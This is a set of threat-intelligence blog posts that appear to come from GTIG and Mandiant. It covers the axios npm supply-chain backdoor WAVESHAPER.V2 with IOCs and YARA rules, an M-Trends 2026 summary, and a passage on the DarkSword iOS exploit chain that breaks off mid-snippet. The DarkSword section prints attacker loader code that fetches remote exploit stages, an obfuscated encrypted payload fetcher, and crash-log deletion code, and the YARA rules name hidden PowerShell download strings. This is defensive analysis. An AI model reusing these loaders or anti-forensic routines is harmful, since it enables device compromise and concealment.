The platform-specific payloads ultimately deploy variants of a backdoor tracked by GTIG as WAVESHAPER.V2, a backdoor written in C++ that targets macOS to collect system information, enumerate directories, or execute additional payloads and that connects to the C2 provided via command-line arguments. Notably, GTIG identified additional variants of WAVESHAPER.V2 written in PowerShell and Python to target diverse environments. Regardless of the operating system, the malware beacons to the C2 endpoint over port 8000 at 60-second intervals. The beacon consists of Base64-encoded JSON data and uses a hard-coded User-Agent: 

mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)

Following the initial beaconing to the adversary infrastructure, WAVESHAPER.V2 continuously polls, pausing for 60 seconds awaiting instructions. The server response determines the next action taken by the implant. The backdoor supports multiple commands outlined in the Table 1.

Command

Description

kill

Terminates the malware's execution process.

rundir

Retrieves detailed directory listings, including file paths, sizes, and creation/modification timestamps for paths specified in the ReqPaths parameter.

runscript

Decodes and executes a provided AppleScript payload.

peinject

Decodes, drops, ad-hoc signs, and executes an arbitrary binary payload with optional parameters.

Table 1: WAVESHAPER.V2 commands

On Windows, persistence is achieved by creating a hidden batch file (%PROGRAMDATA%\system.bat) and adding a new entry named MicrosoftUpdate to HKCU:\Software\Microsoft\Windows\CurrentVersion\Run to launch it at logon.

WAVESHAPER.V2 acts as a fully functional RAT with the following capabilities:

  • Reconnaissance: Extracts system telemetry, including hostname, username, boot time, time zone, OS version, and detailed running process lists.

  • Command Execution: Supports multiple execution methods, including in-memory Portable Executable (PE) injection and arbitrary shell commands. The shell execution command expects a script and script parameters from C2; if no script is provided, the parameter is executed as a PowerShell command, but if a script is provided, it is either Base64-encoded or placed into a file depending on its size.

  • File System Enumeration: Returns detailed metadata for requested target directories by continuously recursing through the file system.

Attribution

GTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since 2018. Analysis of the C2 infrastructure (sfrclak[.]com resolving to 142.11.206.73) revealed connections from a specific AstrillVPN node previously used by UNC1069. Additionally, adjacent infrastructure hosted on the same ASN has been historically linked to UNC1069 operations.

Furthermore, WAVESHAPER.V2 is a direct evolution of WAVESHAPER, a macOS and Linux backdoor previously attributed to UNC1069. While the original WAVESHAPER uses a lightweight, raw binary C2 protocol and employs code packing, WAVESHAPER.V2 communicates using JSON, collects additional system information, and supports more backdoor commands. Despite these upgrades, both versions accept their C2 URL dynamically via command-line arguments, share identical C2 polling behaviors and an uncommon User-Agent string, and deploy secondary payloads to identical temporary directories (e.g., /Library/Caches/com.apple.act.mond).

Outlook and Implications

The impact of this attack by North Korea-nexus actors is broad and has ripple effects as other popular packages rely on axios as a dependency. Notably, UNC1069 isn’t the only threat actor that has launched successful open source supply chain attacks in recent weeks. UNC6780 (also known as TeamPCP) recently poisoned GitHub Actions and PyPI packages associated with projects like Trivy, Checkmarx, and LiteLLM to deploy the SANDCLOCK credential stealer and facilitate follow-on extortion operations. 

Hundreds of thousands of stolen secrets could potentially be circulating as a result of these recent attacks. This could enable further software supply chain attacks, software as a service (SaaS) environment compromises (leading to downstream customer compromises), ransomware and extortion events, and cryptocurrency theft over the near term. 

Supply chain compromise is a particularly dangerous tactic because it abuses the inherent trust that users and enterprise administrators place in hardware, software, and updates supplied by reputable vendors as well as the trust they may not realize they are placing in collaborative code-sharing communities. Defenders should pay close attention to these campaigns, and enterprises should initiate dedicated efforts to assess the existing impact, remediate compromised systems, and harden environments against future attacks.

Remediation 

GTIG urges all developers and organizations using the axios package to take immediate corrective action. Priority should be given to auditing dependency trees for compromised versions, isolating affected hosts, and rotating any potentially exposed secrets or credentials. Following initial containment, organizations must implement long-term hardening through strict version pinning and enhanced supply-chain monitoring.

  • Version Control: Do not upgrade to axios version 1.14.1 or 0.30.4. Ensure corporate-managed NPM repositories are configured to serve only known-good versions (e.g., 1.14.0 or earlier; 0.30.3 or earlier).

  • Dependency Pinning: Pin axios to a known safe version in your package-lock.json to prevent accidental upgrades.

  • Malicious Package Audit: Inspect project lockfiles specifically for the 'plain-crypto-js' package (versions 4.2.0 or 4.2.1). Use tools like Wiz or Open Source Insights for deeper dependency auditing.

  • Pipeline Security: Pause CI/CD deployments for any package relying on axios. Validate that builds are not pulling "latest" versions before redeploying with pinned, safe versions. 

  • Incident Response: If plain-crypto-js is detected, assume the host environment is compromised. Revert the environment to a known-good state and rotate all credentials or secrets present on that machine.

  • Network Defense: Block all traffic to sfrclak[.]com and the command & control IP: 142.11.206.73. Monitor and alert on any endpoint communication attempts to this domain.

  • Cache Remediation: Clear local and shared npm, yarn, and pnpm caches on all workstations and build servers to prevent re-infection during subsequent installs.

  • Endpoint Protection: Deploy EDR to protect developer environments. Monitor for suspicious processes spawning from Node.js applications that match known Indicators of Compromise (IOCs).

  • Credential Management: Rotate all tokens and API keys used by applications confirmed to have run indicators of compromise (IOCs).

  • Developer Sandboxing & Secret Vaulting: Isolate development environments in containers or sandboxes to restrict host filesystem access, and migrate plaintext secrets to the OS keychain using aws-vault. This ensures compromised packages cannot programmatically scrape credentials or execute malicious scripts directly on the host machine.

Indicators of Compromise (IOCs) 

To assist the wider community in hunting and identifying the activity outlined in this blog post, we have included IOCs in a free GTI Collection for registered users.

Network Indicators

Indicator

Type 

Notes 

142.11.206.73

C2

WAVESHAPER.V2

sfrclak[.]com

C2

WAVESHAPER.V2

http://sfrclak[.]com:8000

C2

WAVESHAPER.V2

http://sfrclak[.]com:8000/6202033

C2

WAVESHAPER.V2

23.254.167.216

C2

Suspected UNC1069 Infrastructure

File Indicators

Family

Notes

SHA256

WAVESHAPER.V2

Linux Python RAT

fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf

WAVESHAPER.V2

macOS Native Binary

92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a

WAVESHAPER.V2

Windows Stage 1

617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101

WAVESHAPER.V2

N/A 

ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c

SILKBELL

N/A 

e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

N/A 

system.bat

f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd

N/A 

plain-crypto-js-4.2.1.tgz

58401c195fe0a6204b42f5f90995ece5fab74ce7c69c67a24c61a057325af668

YARA Rules

These rules may be most useful on developer workstations, CI/build systems, and other suspected impacted hosts for retrospective hunting and validation.

rule G_Backdoor_WAVESHAPER.V2_PS_1
{
    meta:
        description = "Detects the WAVESHAPER.V2 PowerShell backdoor which communicates with C2 via base64 encoded JSON beacons and supports PE injection and script execution"
        author = "GTIG"
        md5 = "04e3073b3cd5c5bfcde6f575ecf6e8c1"
        date_created = "2026/03/31"
        date_modified = "2026/03/31"
        rev = 1
        platforms = "Windows"
        family = "WAVESHAPER.V2"
    strings:
        $ss1 = "packages.npm.org/product1" ascii wide nocase
        $ss2 = "Extension.SubRoutine" ascii wide nocase
        $ss3 = "rsp_peinject" ascii wide nocase
        $ss4 = "rsp_runscript" ascii wide nocase
        $ss5 = "rsp_rundir" ascii wide nocase
        $ss6 = "Init-Dir-Info" ascii wide nocase
        $ss7 = "Do-Action-Ijt" ascii wide nocase
        $ss8 = "Do-Action-Scpt" ascii wide nocase
    condition:
        uint16(0) != 0x5A4D and filesize < 100KB and 5 of ($ss*)
}
rule G_Hunting_Downloader_suspected_UNC1069_PS_1
{
    meta:
        description = "Detects PowerShell dropper associated with suspected UNC1069 and Axios npm package supply chain attack. Associated to WAVESHAPER.V2"
        author = "GTIG"
        md5 = "089e2872016f75a5223b5e02c184dfec"
        date_created = "2026/03/31"
        date_modified = "2026/03/31" 
        rev = 1
        platforms = "Windows"
    strings:
        $ss1 = "start /min powershell -w h" ascii wide nocase
        $ss2 = "[scriptblock]::Create([System.Text.Encoding]::UTF8.GetString" ascii wide nocase
        $ss3 = "Invoke-WebRequest -UseBasicParsing" ascii wide nocase
        $ss4 = "-Method POST -Body" ascii wide nocase
        $ss5 = "packages.npm.org/product1" ascii wide nocase
    condition:
        uint16(0) != 0x5A4D and filesize < 5KB and all of them
}
rule G_Hunting_Downloader_SILKBELL_1
{
    meta:
        description = "Detects the obfuscated version of the JS NPM supply chain downloader using Base64 obfuscation and custom XOR. Associated with WAVESHAPER.V2"
        author = "GTIG"
        md5 = "7658962ae060a222c0058cd4e979bfa1"
        date_created = "2026/03/31"
        date_modified = "2026/03/31" 
        rev = 1
        platforms = "Any"
    strings:
        $ss1 = "OrDeR_7077" ascii wide fullword
        $ss2 = "String.fromCharCode(S^a^333)" ascii wide
        $ss3 = "\"TE9DQUw^\".replaceAll(\"^\",\"=\")" ascii wide
        $ss4 = "\"UFM_\".replaceAll(\"_\",\"=\")" ascii wide
        $ss5 = "\"U0NSXw--\".replaceAll(\"-\",\"=\")" ascii wide
        $ss6 = "\"UFNfQg--\".replaceAll(\"-\",\"=\")" ascii wide
        $ss7 = "\"d2hlcmUgcG93ZXJzaGVsbA((\".replaceAll(\"(\",\"=\")" ascii wide
    condition:
        uint16(0) != 0x5A4D and filesize < 100KB and all of them
}

Google Security Operations (SecOps)

Google Security Operations (SecOps) customers have access to the following broad category rules and more under the Mandiant Intel Emerging Threats rule pack.

  • Curl Writing Apple System File to Staging Directory

  • Node Spawning Nohup Osascript

  • Node Spawning Windows Script Host With Delete Command

  • Windows Script Host Spawning Shell With Curl

  • Windows Terminal In Suspicious Staging Directory

Wiz

Wiz customers should check their Wiz Threat Center for information on this advisory and whether or not they are impacted. For more information refer to Wiz’s blog post, Axios NPM Distribution Compromised in Supply Chain Attack.

M-Trends 2026: Data, Insights, and Strategies From the Frontlines

23 March 2026 at 15:00

Every year, the cyber threat landscape forces defenders to adapt to evolving adversary tactics, techniques, and procedures (TTPs). In 2025, Mandiant observed a clear divergence in adversary pacing that closely aligns with the trends we have been documenting for defenders over the past year. On one end of the spectrum, cyber criminal groups optimized for immediate impact and deliberate recovery denial. On the other end, sophisticated cyber espionage groups and insider threats optimized for extreme persistence, utilizing unmonitored edge devices and native network functionalities to evade detection.

Today, we release M-Trends 2026. Grounded in over 500,000 hours of frontline incident investigations conducted by Mandiant globally in 2025, this report provides a definitive look at the TTPs actively being used in breaches today.

aside_block
<ListValue: [StructValue([('title', 'M-Trends 2026 is available!'), ('body', <wagtail.rich_text.RichText object at 0x7f65bbb34940>), ('btn_text', 'Download now'), ('href', 'https://cloud.google.com/security/resources/m-trends?utm_source=cgc-blog&utm_medium=blog&utm_campaign=FY26-Q1-GLOBAL-STO89-website-dl-dgcsm-mtrends26-162712&utm_content=-&utm_term=-'), ('image', <GAEImage: m-trends blog callout>)])]>

By the Numbers: M-Trends 2026

The metrics in this year's report highlight how adversaries are shifting their approaches to bypass modern security controls:

  • Global Median Dwell Time: Global median dwell time rose to 14 days from 11 days. This shift likely reflects growing sophistication, particularly in evading defenses. When looking specifically at the high quantity of cyber espionage and North Korean IT worker incidents, the median dwell time for both categories was 122 days.

  • Initial Infection Vectors: Exploits remained the most common initial infection vector for the sixth consecutive year, accounting for 32% of intrusions. However, highly interactive voice phishing saw a significant surge to 11%, becoming the second-most commonly observed vector.

  • Detection by Source: Organizations are improving their internal visibility. Across all 2025 investigations, 52% of the time organizations first detected evidence of malicious activity internally, an increase from 43% in 2024.

  • Targeted Industries: The full scope of incidents affected more than 16 industry verticals, with the high tech sector (17%) outpacing the financial sector (14.6%) as the most frequently targeted industry, shifting the financial sector out of the top spot it held in 2024 and 2023.

The Collapse of the "Hand-Off" Window

One of the most notable trends we observed in 2025 is the increased specialization and collaboration within the cyber crime ecosystem. Initial access partners are using low-impact techniques, such as malicious advertisements or the ClickFix social engineering technique, to gain a foothold. They then hand off this access to secondary groups who execute high-impact operations like ransomware.

In 2022, the median time between an initial access event and the hand-off to a secondary threat group was more than 8 hours. In 2025, that window collapsed to just 22 seconds. Initial access partners are increasingly pre-staging the secondary group's preferred malware or tunnels during the initial infection, meaning secondary actors are fully equipped to launch operations the moment they first interact with the network.

This pattern is reflected in how attackers are breaching organizations. We found that prior compromise ranked as the third-most common initial infection vector (10%) for intrusions globally, and the top initial infection vector in ransomware operations (30%), doubling what it was in 2024 (15%).

Voice Phishing and the SaaS Identity Crisis

Historically, email phishing has been an adversary staple. But as automated technical controls have improved, email phishing dropped to just 6% of intrusions in 2025. In its place, adversaries have pivoted to highly interactive, voice-based social engineering.

We have extensively documented this progression in blog posts and reports, notably tracking how groups like UNC3944 target IT help desks to bypass multifactor authentication (MFA) and gain initial access to software-as-a-service (SaaS) environments (see: Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft).

M-Trends 2026 reveals the cascading impact of these techniques. Threat actors are bypassing standard defenses by harvesting long-lived OAuth tokens and session cookies. By compromising third-party SaaS vendors, attackers steal hard-coded keys and personal access tokens, using those secrets to seamlessly pivot into downstream customer environments to execute large-scale data theft.

Ransomware Evolves into Recovery Denial

Ransomware groups are no longer just encrypting data; they are actively destroying the ability to recover. In 2025, we observed a systemic shift where ransomware operators, including prolific groups using REDBIKE (Akira) and AGENDA (Qilin), actively targeted backup infrastructure, identity services, and virtualization management planes.

Attackers are exploiting misconfigured Active Directory Certificate Services templates to create admin accounts that bypass password rotation and are actively deleting backup objects from cloud storage. Furthermore, attackers are exploiting the "Tier-0" nature of hypervisors to bypass guest-level defenses. By targeting the virtualization storage layer directly or encrypting hypervisor datastores, they can render all associated virtual machines inoperable simultaneously.

This directly aligns with the complex intrusions we outlined in our guide, From Help Desk to Hypervisor: Defending Your VMware vSphere Estate from UNC3944. Modern ransomware is now a fundamental resilience problem, forcing organizations into a choice: pay or rebuild.

Edge Devices, Zero-Days, and Extreme Persistence

While cyber criminals optimize for speed, espionage groups are optimizing for extreme persistence. Threat clusters like UNC6201 and UNC5807 deliberately target edge and core network devices, such as virtual private networks (VPNs) and routers, that typically lack standard endpoint detection and response (EDR) telemetry. M-Trends 2026 reveals that the mean time to exploit vulnerabilities dropped to an estimated -7 days, meaning exploitation is routinely occurring before a patch is even released. This acceleration underscores the severity of the trends and campaigns we have recently documented, from increasing zero-day usage over 2024 (as reported on in Look at What You Made Us Patch: 2025 Zero-Days in Review2025 Zero-Days in Review) to our analysis of UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day. By leveraging native packet-capturing functionality on these devices, adversaries can directly intercept sensitive data and plaintext credentials as they transit the network, allowing them to gather intelligence without ever needing to move deeper into traditional sources like workstations or servers.

Attackers are deploying custom, in-memory malware like the BRICKSTORM backdoor directly onto these network appliances to establish deep persistence that routinely survives standard remediation efforts and system reboots. Because these devices are designed with minimal onboard storage and cannot support traditional security tooling, conducting file system or memory forensics presents a significant challenge, often leaving security teams with limited artifacts to confirm an attacker's presence or properly scope the remediation. Furthermore, this extreme persistence creates a critical visibility gap. With threats like BRICKSTORM achieving dwell times of nearly 400 days, standard 90-day log retention policies leave organizations completely blind to the initial access vector and the full scope of the intrusion.

AI Threat Landscape

A comprehensive overview of the 2025 threat landscape requires addressing adversary use of artificial intelligence (AI). Ongoing Google Threat Intelligence Group research reveals that adversaries are integrating AI to accelerate the attack lifecycle. We have seen malware families like PROMPTFLUX and PROMPTSTEAL actively query large language models (LLMs) mid-execution to evade detection, while "distillation attacks" threaten intellectual property by extracting the proprietary logic and specialized training data of high-value machine learning models. M-Trends 2026 confirms attackers are abusing AI within compromised environments. For example, the QUIETVAULT credential stealer was observed checking targeted machines for local AI command-line tools, executing predefined prompts to search for configuration files. 

Despite these rapid technological advancements, we do not consider 2025 to be the year where breaches were the direct result of AI. From our view on the frontlines, the vast majority of successful intrusions still stem from fundamental human and systemic failures. However, to ensure organizations are prepared as AI-powered capabilities evolve, Mandiant red teams are actively incorporating AI-driven techniques into engagements—such as prompt injection—to rigorously test defenses against emerging threats. By highlighting the unique risks surrounding AI implementations, such as the abuse of developer toolchains, we help organizations establish behavioral baselines and adopt principles from the Google Secure AI Framework (SAIF). Beyond securing the AI models themselves, we also help organizations leverage AI-powered defense as a force multiplier for security operations. For a deeper dive into AI and security, read our recently published paper, AI risk and resilience: A Mandiant special report.

Recommendations for Defenders

To build true operational resilience and outmaneuver modern adversaries, organizations must move at the speed of the attacker. M-Trends 2026 provides extensive, actionable guidance, including:

  • Treat Low-Impact Alerts as Critical Indicators: With hand-off times shrinking to seconds, security teams must restructure response playbooks. Treat routine malware alerts as high-priority indicators of an impending secondary intrusion, and remediate before interactive hands-on-keyboard operations begin.

  • Isolate Critical Control Planes: Virtualization and management platforms must be treated as Tier-0 assets with the strictest access constraints. To counter the destruction of recovery capabilities, backup environments should be decoupled from the corporate Active Directory domain and utilize immutable storage (to defend against these attacks, review our guide, Proactive Preparation and Hardening Against Destructive Attacks: 2026 Edition).

  • Shift to Continuous Identity Verification: Because interactive social engineering frequently bypasses traditional MFA, organizations must enforce strict least privilege, regularly audit SaaS integrations, and route all SaaS applications through a central identity provider (IdP).

  • Transition from Static IOCs to Behavioral Anomaly Detection: With attackers rapidly changing infrastructure and deploying custom, in-memory malware, relying solely on static indicators of compromise (IOCs) is no longer sufficient. Defenders must implement behavior-based detection models that flag anomalous activity and deviations from established baselines, specifically concerning unauthorized access to edge devices, anomalous bulk API operations, or the suspicious use of SaaS integration tokens.

  • Expand Visibility and Extend Log Retention: Deploy advanced threat detection across the entire ecosystem. To close the visibility gap associated with multi-year intrusions, organizations must extend log retention policies well beyond standard 90-day windows. Forward critical network device logs—especially application and administrative logs—and hypervisor-level telemetry to centralized, long-term storage to eliminate the blind spots sophisticated actors rely upon.

Be Ready to Respond

The Mandiant mission is to help keep every organization secure from cyber threats and confident in their readiness. For 17 years, our annual M-Trends report has been a core component of advancing that mission, sharing frontline knowledge to help defenders close critical visibility gaps.

To learn about the cyber threat landscape, and how we recommend organizations adapt to its ongoing changes, explore our M-Trends 2026 resources:

The Proliferation of DarkSword: iOS Exploit Chain Adopted by Multiple Threat Actors

18 March 2026 at 15:00

Introduction 

Google Threat Intelligence Group (GTIG) has identified a new iOS full-chain exploit that leveraged multiple zero-day vulnerabilities to fully compromise devices. Based on toolmarks in recovered payloads, we believe the exploit chain to be called DarkSword. Since at least November 2025, GTIG has observed multiple commercial surveillance vendors and suspected state-sponsored actors utilizing DarkSword in distinct campaigns. These threat actors have deployed the exploit chain against targets in Saudi Arabia, Turkey, Malaysia, and Ukraine.

DarkSword supports iOS versions 18.4 through 18.7 and utilizes six different vulnerabilities to deploy final-stage payloads. GTIG has identified three distinct malware families deployed following a successful DarkSword compromise: GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER. The proliferation of this single exploit chain across disparate threat actors mirrors the previously discovered Coruna iOS exploit kit. Notably, UNC6353, a suspected Russian espionage group previously observed using Coruna, has recently incorporated DarkSword into their watering hole campaigns.

In this blog post, we examine the uses of DarkSword by these distinct threat actors, provide an analysis of their final-stage payloads, and describe the vulnerabilities leveraged by DarkSword. GTIG reported the vulnerabilities used in DarkSword to Apple in late 2025, and all vulnerabilities were patched with the release of iOS 26.3 (although most were patched prior). We have added domains involved in DarkSword delivery to Safe Browsing, and strongly urge users to update their devices to the latest version of iOS. In instances where an update is not possible, it is recommended that Lockdown Mode be enabled for enhanced security.

This research is published in coordination with our industry partners at Lookout and iVerify.

Discovery Timeline

GTIG has identified several different users of the DarkSword exploit chain dating back to November 2025. In addition to the case studies on DarkSword usage documented in this blog post, we assess it is likely that other commercial surveillance vendors or threat actors may also be using DarkSword.

DarkSword iOS Exploit Chain timeline

Figure 1: Timeline of DarkSword observations and vulnerability patches

Saudi Arabian Users Targeted via Snapchat-Themed Website (UNC6748)

In early November 2025, GTIG identified the threat cluster UNC6748 leveraging a Snapchat-themed website, snapshare[.]chat, to target Saudi Arabian users (Figure 2). The landing page on the website included JavaScript code using a mix of obfuscation techniques, and created a new IFrame that pulled in another resource at frame.html (Figure 3). The landing page JavaScript also set a session storage key named uid, and checked if that key was already set prior to creating the IFrame that fetches the next delivery stage. We assess this is to prevent re-infecting prior victims. In subsequent observations of UNC6748 throughout November 2025, we observed them update the landing page to include anti-debugging and additional obfuscation to hinder analysis. We also identified additional code added when the actor attempts to infect a user using Chrome, where the x-safari-https protocol handler is used to open the page in Safari (Figure 4). This suggests that UNC6748 didn't have an exploit chain for Chrome at the time of this activity. During the infection process, the victim is redirected to a legitimate Snapchat website in an attempt to masquerade the activity.

frame.html is a simple HTML file that dynamically injects a new script tag that loads in the main exploit loader, rce_loader.js (Figure 5). The loader performs some initialization used by subsequent stages, and fetches a remote code execution (RCE) exploit from the server using XMLHttpRequest (Figure 6).

We observed UNC6748 activity multiple times throughout November 2025, where both major and minor updates were made to their infection process:

  • The first UNC6748 activity we observed only had support for one RCE exploit split across two files, rce_module.js and rce_worker_18.4.js (Figure 7). This exploit primarily leveraged CVE-2025-31277, a memory corruption vulnerability in JavaScriptCore (the JavaScript engine used in WebKit and Apple Safari), and also CVE-2026-20700, a Pointer Authentication Codes (PAC) bypass in dyld.

  • We then identified activity several days later where another RCE exploit was added, rce_worker_18.6.js (Figure 8). This exploit used CVE-2025-43529, a different memory corruption vulnerability in JavaScriptCore, alongside the same CVE-2026-20700 exploit in the same file.

    • The loader was modified to also fetch a rce_module_18.6.js payload, which only defined a simple function that was not observed in use elsewhere.

    • However, the logic implemented for this did not correctly serve the iOS 18.4 exploit if the device version wasn't 18.6, and did not account for the existence of iOS 18.7, even though it was released two months prior in September 2025. This suggests that this update may have been originally written months prior to UNC6748 acquiring and/or deploying it.

  • Later in November 2025, we observed another module added, rce_worker_18.7.js (Figure 9). This was an updated version of rce_worker_18.6.js, but with offsets added to support iOS 18.7.

    • There was also a logic flaw in the loader in this case, as it loaded the exploit for iOS 18.7 regardless of the detected device version.

In our observations, UNC6748 used the same modules for sandbox escapes and privilege escalation, along with the same final payload, GHOSTKNIFE.

decoy page

Figure 2: snapshare[.]chat decoy page

if (!sessionStorage.getItem("uid") && isTouchScreen) {
  sessionStorage.setItem("uid", '1');
  const frame = document.createElement("iframe");
  frame.src = "frame.html?" + Math.random();
  frame.style.height = 0;
  frame.style.width = 0;
  frame.style.border = "none";
  document.body.appendChild(frame);
} else {
  top.location.href = "red";
}

Figure 3: Landing page snippet that loads frame.html (UNC6748, November 2025)

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <script type="text/javascript">document.write('<script defer=\"defer\" src=\"rce_loader.js\"\>\<\/script\>');</script>
</body>
</html>

Figure 4: frame.html contents (UNC6748, November 2025)

if (typeof browser !== "undefined" || !isIphone()) {
        console.log("");
} else {
        location.href = "x-safari-https://snapshare.chat/<redacted>";
}

Figure 5: Landing page code snippet showing x-safari-https use (UNC6748, November 2025)

function getJS(fname,method = 'GET') 
{
    try 
    {
        url = fname;
        print(`trying to fetch ${method} from: ${url}`);
        let xhr = new XMLHttpRequest();
        xhr.open("GET", `${url}` , false);
        xhr.send(null);
        return xhr.responseText;
    }
    catch(e)
    {
        print("got error in getJS: " + e);
    }
}

Figure 6: rce_loader.js snippet showing the logic for fetching additional stages (UNC6748, November 2025)

let workerCode = "";
workerCode = getJS(`rce_worker_18.4.js`); // local version
let workerBlob = new Blob([workerCode],{type:'text/javascript'});
let workerBlobUrl = URL.createObjectURL(workerBlob);

Figure 7: rce_loader.js snippet showing a single RCE exploit worker being loaded (UNC6748, November 2025)

let workerCode = "";
if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2')
    workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version
else
    workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version
let workerBlob = new Blob([workerCode],{type:'text/javascript'});
let workerBlobUrl = URL.createObjectURL(workerBlob);

Figure 8: rce_loader.js snippet showing (attempted) support for different RCE exploit workers (UNC6748, November 2025)

let workerCode = "";
if(ios_version == '18,7')
    workerCode = getJS(`rce_worker_18.7.js?${Date.now()}`); // local version
else
    workerCode = getJS(`rce_worker_18.7.js?${Date.now()}`); // local version
let workerBlob = new Blob([workerCode],{type:'text/javascript'});
let workerBlobUrl = URL.createObjectURL(workerBlob);

Figure 9: rce_loader.js snippet with iOS 18.7 support added (UNC6748, November 2025)

GHOSTKNIFE

In this activity, we observed UNC6748 deploy a backdoor GTIG tracks as GHOSTKNIFE. GHOSTKNIFE, written in JavaScript, has several modules for exfiltrating different types of data, including signed-in accounts, messages, browser data, location history, and recordings. It also supports downloading files from the C2 server, taking screenshots, and recording audio from the device's microphone. GHOSTKNIFE communicates with its C2 server using a custom binary protocol over HTTP, encrypted using a scheme based on ECDH and AES. GHOSTKNIFE can update its config with new parameters from its C2 server.

GHOSTKNIFE writes files to disk during its execution under /tmp/<uuid>.<numbers>, where uuid is a randomly generated UUIDv4 value and numbers is a hard-coded sequence of several digits. Under that directory, it creates multiple subfolders including STORAGE, DATA, and TMP. As each module of GHOSTKNIFE executes, it writes its data to /tmp/<uuid>.<numbers>/STORAGE/<uuid2>.<id>, where id is the numeric value of the module and uuid2 is a different randomly generated UUIDv4 value. Additionally, GHOSTKNIFE periodically erases crash logs from the device to cover its tracks in case of unexpected failures (Figure 10).

 cleanLogs(){
       let files =  MyHelper.getContentsOfDir("/var/mobile/Library/Logs/CrashReporter/");
       for(let file of files){//.ips  // mediaplaybackd-" panic-full-
        if(file.includes("mediaplaybackd") || file.includes("SpringBoard") || file.includes("com.apple.WebKit.") || file.includes("panic-full-") ){
          MyHelper.deleteFileAtPath(file);
        }
       }
  }

Figure 10: GHOSTKNIFE snippet responsible for deleting crash logs

Campaigns Targeting Users in Turkey and Malaysia (PARS Defense)

In late November 2025, GTIG observed activity associated with the Turkish commercial surveillance vendor PARS Defense where DarkSword was used in Turkey, with support for iOS 18.4-18.7. Unlike the UNC6748 activity, this campaign was carried out with more attention to OPSEC, with obfuscation applied to the exploit loader and some of the exploit stages, and the use of ECDH and AES to encrypt exploits between the server and the victim (Figure 11). Additionally, the obfuscated version of rce_loader.js used by PARS Defense fetched the correct RCE exploit depending on the detected iOS version (Figure 12).

Subsequently, in January 2026, GTIG observed additional activity in Malaysia associated with a different PARS Defense customer. In this case, we were able to collect a different loader used in the activity, which contains additional device fingerprinting logic, and also used the uid session storage check. This loader also uses the top.location.href redirect for targets that do not pass all of the checks like UNC6748 did, but also sets window.location.href to the same URL (Figure 13).

Where available, GTIG identified a different final payload used in this activity, a backdoor we track as GHOSTSABER.

function getJS(_0x12fba8) {
  const _0x35744f = generateKeyPair();
  const _0x4a6eb4 = exportPublicKeyAsPem(_0x35744f.publicKey);
  const _0x1bc168 = self.btoa(_0x4a6eb4);
  const _0x119092 = {
    'a': _0x1bc168
  };
  _0x12fba8 = _0x12fba8.startsWith('/') ? _0x12fba8 : '/' + _0x12fba8;
  const _0x1fedd2 = new XMLHttpRequest();
  _0x1fedd2.open('POST', 'https://<redacted>' + (_0x12fba8 + '?' + Date.now()), false);
  _0x1fedd2.setRequestHeader('Content-Type', 'application/json');
  _0x1fedd2.send(JSON.stringify(_0x119092));
  if (_0x1fedd2.status === 0xc8) {
    const _0x362968 = JSON.parse(_0x1fedd2.responseText);
    const _0x32efb2 = _0x362968.a;
    const _0x46ca4b = _0x362968.b;
    const _0xfae3b8 = b64toUint8Array(_0x32efb2);
    const _0x2f4536 = b64toUint8Array(_0x46ca4b);
    const _0xa36b4f = deriveAesKey(_0x35744f.privateKey, _0x2f4536);
    const _0x36e338 = decryptData(_0xfae3b8, _0xa36b4f);
    const _0x50186a = new TextDecoder().decode(_0x36e338);
    return _0x50186a;
  }
  return null;
}

Figure 11: Deobfuscated getJS() snippet from the DarkSword loader (PARS Defense, November 2025)

let workerCode = '';
if (ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2' || ios_version == '18,7') {
  workerCode = getJS('6cde159c.js?' + Date.now());
} else {
  workerCode = getJS('a9bc5c66.js?' + Date.now());
}
let workerBlob = new Blob([workerCode], {
  'type': 'text/javascript'
});
let workerBlobUrl = URL.createObjectURL(workerBlob);

Figure 12: Deobfuscated snippet for loading the RCE workers (PARS Defense, November 2025)

if (!sessionStorage.getItem('uid') && canUseApplePay() && "standalone" in navigator && (CSS.supports("backdrop-filter: blur(10px)") || CSS.supports("-webkit-backdrop-filter: blur(10px)")) && document.pictureInPictureEnabled && !(typeof window.chrome === "object" && window.chrome !== null) && !('InstallTrigger' in window) && supportsWebGL2() && getDeviceInputInfo() && !("vibrate" in navigator) && debuggerCheck()) {
  (() => {
    function _0x45e723(_0x52731a) {
      const _0x43f8d9 = generateKeyPair();
      const _0x427066 = exportPublicKeyAsPem(_0x43f8d9.publicKey);
      const _0x5cfee7 = self.btoa(_0x427066);
      const _0x96910f = {
        'a': _0x5cfee7
      };
      _0x52731a = _0x52731a.startsWith('/') ? _0x52731a : '/' + _0x52731a;
      const _0x436cc4 = new XMLHttpRequest();
      _0x436cc4.open("POST", 'https://<redacted>' + (_0x52731a + '?' + Date.now()), false);
      _0x436cc4.setRequestHeader('Content-Type', "application/json");
      _0x436cc4.send(JSON.stringify(_0x96910f));
      if (_0x436cc4.status === 0xc8) {
        const _0x4a4193 = JSON.parse(_0x436cc4.responseText);
        const _0x362b30 = _0x4a4193.a;
        const _0x536004 = _0x4a4193.b;
        const _0x183b3f = b64toUint8Array(_0x362b30);
        const _0x46bbee = b64toUint8Array(_0x536004);
        const _0x43e600 = deriveAesKey(_0x43f8d9.privateKey, _0x46bbee);
        const _0x2e0735 = decryptData(_0x183b3f, _0x43e600);
        const _0x26a8b1 = new TextDecoder().decode(_0x2e0735);
        return _0x26a8b1;
      }
      return null;
    }
    let _0x100ce6 = _0x45e723('6297d177.html?' + Math.random());
    const _0x5f5a7d = document.createElement("iframe");
    _0x5f5a7d.srcdoc = _0x100ce6;
    _0x5f5a7d.style.height = 0x0;
